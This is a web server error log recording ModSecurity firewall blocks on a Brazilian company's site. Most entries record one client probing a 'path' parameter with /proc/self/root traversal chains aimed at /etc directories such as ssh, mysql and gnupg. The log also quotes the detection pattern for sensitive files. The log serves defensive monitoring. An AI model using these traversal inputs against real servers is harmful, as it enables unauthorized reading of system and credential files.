[Mon Mar 16 09:35:12.242242 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:48422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5AAlT9VtDQc7bgUyZOAAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:35:14.639469 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.243.203:42474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5AhXjF1vJNtV6CWrl_AAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:35:32.416473 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:42488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5FNSswJuvopo3lOhNIAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:35:38.272358 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.243.203:48088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5GhXjF1vJNtV6CWrmCAAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:35:39.607046 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:48094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5G3jZBu2q05ozVU9CqgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:35:40.102249 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.228.16:40736] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf5HLABkC4fWIHEf8HX6wAAAFI"]
[Mon Mar 16 09:35:45.087497 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:44048] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5IZqj1wV0Si-OkefWWwAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:35:48.491766 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.243.203:44062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5JJqj1wV0Si-OkefWXgAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:35:50.869582 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.243.203:44064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5JnjZBu2q05ozVU9CsgAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:35:58.135793 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:33532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5Lo6lpbStxTqkSktcFAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:35:59.400171 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:33542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5L9SswJuvopo3lOhNJgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:36:01.202841 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:41744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5MAlT9VtDQc7bgUyZSgAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:36:03.659407 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.243.203:41754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5M9SswJuvopo3lOhNKgAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:36:06.009535 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.243.203:41770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5NnbQATo66fKoS7w5zwAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:36:23.308035 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:41772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5R5qj1wV0Si-OkefWbwAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:36:25.900534 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:59468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5SdSswJuvopo3lOhNMQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:36:27.185989 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:59484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5S5qj1wV0Si-OkefWcAAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:36:29.556414 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:59486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5TbABkC4fWIHEf8HX-wAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:37:24.467554 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:41498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5hLABkC4fWIHEf8HYPAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:37:25.746313 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:60984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5hf9ocpUE4ed4uDzaCAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:37:30.477937 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:60990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5iv9ocpUE4ed4uDzaDQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:37:46.000148 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:42904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf5mdSswJuvopo3lOhNSQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
